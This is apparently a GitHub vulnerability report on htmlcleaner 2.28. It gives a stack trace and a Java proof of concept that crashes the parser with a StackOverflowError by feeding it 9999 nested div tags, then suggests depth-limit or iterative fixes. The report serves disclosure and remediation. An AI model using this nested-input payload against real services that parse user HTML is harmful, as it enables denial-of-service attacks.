Open
Description
Stack overflow error caused by htmlcleaner parsing of untrusted HTML String
Description
Using htmlcleaner to parse an untrusted HTML string may expose an application to denial-of-service (DoS) attacks. If the parser runs on user-supplied input, an attacker can supply deeply nested content that crashes the parser with a StackOverflowError.
Error Log
Exception in thread "main" java.lang.StackOverflowError
at java.base/java.util.HashMap$KeyIterator.<init>(HashMap.java:1531)
at java.base/java.util.HashMap$KeySet.iterator(HashMap.java:913)
at java.base/java.util.HashSet.iterator(HashSet.java:173)
at org.htmlcleaner.HtmlCleaner.addIfNeededToPruneSet(HtmlCleaner.java:1339)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:332)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
at org.htmlcleaner.HtmlCleaner.markNodesToPrune(HtmlCleaner.java:335)
PoC
<dependency>
<groupId>net.sourceforge.htmlcleaner</groupId>
<artifactId>htmlcleaner</artifactId>
<version>2.28</version>
</dependency>
import org.htmlcleaner.HtmlCleaner;
import org.htmlcleaner.TagNode;
public class PoC {
public final static int TOO_DEEP_NESTING = 9999;
public final static String TOO_DEEP_DOC = _nestedDoc(TOO_DEEP_NESTING, "<div>", "</div>", "");
/**
 * Builds a document made of {@code nesting} copies of {@code open}, a line
 * holding {@code content}, and then {@code nesting} copies of {@code close}.
 *
 * <p>Within each run of tokens a newline follows the 1st, 33rd, 65th, ...
 * token, so the generated text is broken into lines instead of being one
 * enormous line.
 *
 * @param nesting number of opening tokens and of closing tokens to emit
 * @param open    token repeated before the content
 * @param close   token repeated after the content
 * @param content text placed on its own line between the two runs
 * @return the assembled document
 */
public static String _nestedDoc(int nesting, String open, String close, String content) {
    // Sizing hint only: it counts the tokens, not the newlines or the content.
    final int initialCapacity = nesting * (open.length() + close.length());
    final StringBuilder doc = new StringBuilder(initialCapacity);

    appendRepeated(doc, open, nesting);
    doc.append("\n");
    doc.append(content);
    doc.append("\n");
    appendRepeated(doc, close, nesting);

    return doc.toString();
}

/** Appends {@code token} {@code count} times, adding a newline after every 32nd token, starting with the first. */
private static void appendRepeated(StringBuilder target, String token, int count) {
    int written = 0;
    while (written < count) {
        target.append(token);
        if (written % 32 == 0) {
            target.append("\n");
        }
        written++;
    }
}
/**
 * Feeds the deeply nested document to {@code HtmlCleaner.clean}.
 *
 * <p>Only {@link Exception} is caught here; a {@link StackOverflowError} is
 * an {@link Error}, so it is not intercepted and propagates out of
 * {@code main}.
 *
 * @param args command-line arguments (unused)
 */
public static void main(String[] args) {
    final String untrustedHtml = TOO_DEEP_DOC;
    try {
        // Risky interface of the component under fuzz testing
        final HtmlCleaner parser = new HtmlCleaner();
        TagNode parsedRoot = parser.clean(untrustedHtml);
        // Perform further operations on the parse result
        // ...
    } catch (Exception ignored) {
        // Handle the exception
    }
}
}
Rectification Solution
-
Follow the jackson-databind approach: add a depth counter that tracks the current parsing depth, and throw an exception when the depth exceeds a configured threshold (FasterXML/jackson-databind@fcfc499).
-
Follow the Gson approach: replace the recursive processing of deeply nested arrays or JSON objects with iterative processing over an explicit stack (google/gson@2d01d6a20f39881c692977564c1ea591d9f39027).
Metadata
Metadata
Assignees
Labels
No labels